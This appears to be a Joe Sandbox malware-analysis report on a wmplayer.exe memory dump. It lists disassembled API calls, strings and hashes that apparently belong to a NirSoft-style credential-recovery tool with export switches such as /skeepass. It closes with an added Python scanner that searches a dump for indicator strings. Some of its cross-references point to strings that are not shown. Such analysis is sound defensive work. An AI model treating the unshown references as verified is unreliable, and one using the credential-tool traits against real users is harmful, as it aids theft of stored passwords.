                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1043902810-0
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                                                            • wcscpy.MSVCRT ref: 004448B4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                            • API String ID: 2899246560-1542517562
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • memset.MSVCRT ref: 004085CF
                                                                                            • memset.MSVCRT ref: 004085F1
                                                                                            • memset.MSVCRT ref: 00408606
                                                                                            • strcmp.MSVCRT ref: 00408645
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                            • memset.MSVCRT ref: 0040870E
                                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                            • String ID: ---
                                                                                            • API String ID: 3437578500-2854292027
                                                                                            • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                            • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041087D
                                                                                            • memset.MSVCRT ref: 00410892
                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1010922700-0
                                                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                            APIs
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                            • malloc.MSVCRT ref: 004186B7
                                                                                            • free.MSVCRT ref: 004186C7
                                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                            • free.MSVCRT ref: 004186E0
                                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                            • malloc.MSVCRT ref: 004186FE
                                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                            • free.MSVCRT ref: 00418716
                                                                                            • free.MSVCRT ref: 0041872A
                                                                                            • free.MSVCRT ref: 00418749
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$FullNamePath$malloc$Version
                                                                                            • String ID: |A
                                                                                            • API String ID: 3356672799-1717621600
                                                                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                            • API String ID: 2081463915-1959339147
                                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2012295524-70141382
                                                                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                            • API String ID: 667068680-3953557276
                                                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1700100422-0
                                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                            • String ID:
                                                                                            • API String ID: 552707033-0
                                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                            • strchr.MSVCRT ref: 0040C140
                                                                                            • strchr.MSVCRT ref: 0040C151
                                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                                            • memset.MSVCRT ref: 0040C17A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                            • String ID: 4$h
                                                                                            • API String ID: 4066021378-1856150674
                                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: %%0.%df
                                                                                            • API String ID: 3473751417-763548558
                                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                                            • GetParent.USER32(?), ref: 00406136
                                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                            • String ID: A
                                                                                            • API String ID: 2892645895-3554254475
                                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                            APIs
                                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                            • memset.MSVCRT ref: 0040DA23
                                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                            • String ID: caption
                                                                                            • API String ID: 973020956-4135340389
                                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                            APIs
                                                                                            Strings
                                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                            • API String ID: 1283228442-2366825230
                                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
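The function above builds an HTML report with _snwprintf and wcscpy, so the template strings it references (the HTML 3.2 DOCTYPE, the nirsoft.net link, the charset meta tag) sit in the wmplayer.exe image (process 0x0D, base 0x400000, snapshot hcaresult_13_2_400000_wmplayer.jbxd) as UTF-16LE. The same holds for the TranslatorName/charset INI keys and the netmsg.dll fallback in the neighbouring functions, which also go through the wide-character CRT. A byte-wise ASCII search of a dump for these strings finds nothing, while the SQLite ATTACH messages further down come from narrow C code and do show up as ASCII. The block below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python scanner that looks for a handful of the strings listed on this page in both encodings, reports the offset and image-relative address of each hit, and counts distinct indicators. The dump it scans is constructed inline from those strings; which strings are stored wide versus narrow in that constructed dump, the indicator names, the threshold and the function names are assumptions for the example.

```python
"""
Scan a memory dump for indicator strings in both ASCII and UTF-16LE.

Added example for this report; not Joe Sandbox, NirSoft or Remcos code.
The indicator texts are copied from strings shown in the report; the
encoding each one takes in the constructed sample dump is an assumption.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# (name, text): texts are strings visible in the report entries above/below.
INDICATORS = [
    ("nirsoft_html_link", '<a href="http://www.nirsoft.net/" target="newwin">'),
    ("html32_doctype", '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'),
    ("translator_ini_key", "TranslatorName"),
    ("netmsg_fallback", "netmsg.dll"),
    ("sqlite_attach_msg", "cannot ATTACH database within transaction"),
]


@dataclass(frozen=True)
class Hit:
    name: str
    encoding: str  # "ascii" or "utf-16le"
    offset: int    # byte offset inside the dump
    rva: int       # offset + image base, to cross-reference report addresses


def _compile_patterns():
    # Each indicator is compiled once per encoding. re.escape on the encoded
    # bytes keeps the quotes, slashes and dots of the HTML template literal.
    pats = []
    for name, text in INDICATORS:
        for enc in ("ascii", "utf-16le"):
            pats.append((name, enc, re.compile(re.escape(text.encode(enc)))))
    return pats


_PATTERNS = _compile_patterns()


def scan(dump: bytes, image_base: int = 0x400000) -> list[Hit]:
    """Return every indicator hit, in either encoding, sorted by offset."""
    hits = [
        Hit(name, enc, m.start(), image_base + m.start())
        for name, enc, pat in _PATTERNS
        for m in pat.finditer(dump)
    ]
    return sorted(hits, key=lambda h: h.offset)


def scan_ascii_only(dump: bytes, image_base: int = 0x400000) -> list[Hit]:
    """What a naive byte-wise grep sees: wide strings are invisible to it."""
    return [h for h in scan(dump, image_base) if h.encoding == "ascii"]


def distinct_indicators(hits: list[Hit]) -> set[str]:
    return {h.name for h in hits}


def classify(hits: list[Hit], threshold: int = 3) -> str:
    # Threshold is an assumption for the example, not a tuned detection.
    if len(distinct_indicators(hits)) >= threshold:
        return "nirsoft-style report strings present"
    return "no verdict"


def build_sample_dump() -> bytes:
    """Constructed dump (not a real image): wide CRT strings, narrow SQLite message."""
    pad = b"\x00" * 64
    return (
        pad
        + INDICATORS[0][1].encode("utf-16le") + pad   # nirsoft link, wide
        + INDICATORS[2][1].encode("utf-16le") + pad   # TranslatorName, wide
        + INDICATORS[3][1].encode("utf-16le") + pad   # netmsg.dll, wide
        + INDICATORS[4][1].encode("ascii") + pad      # SQLite message, narrow
    )


if __name__ == "__main__":
    dump = build_sample_dump()
    for h in scan(dump):
        print(f"{h.rva:08X} {h.encoding:9s} {h.name}")
    print("both encodings:", classify(scan(dump)))
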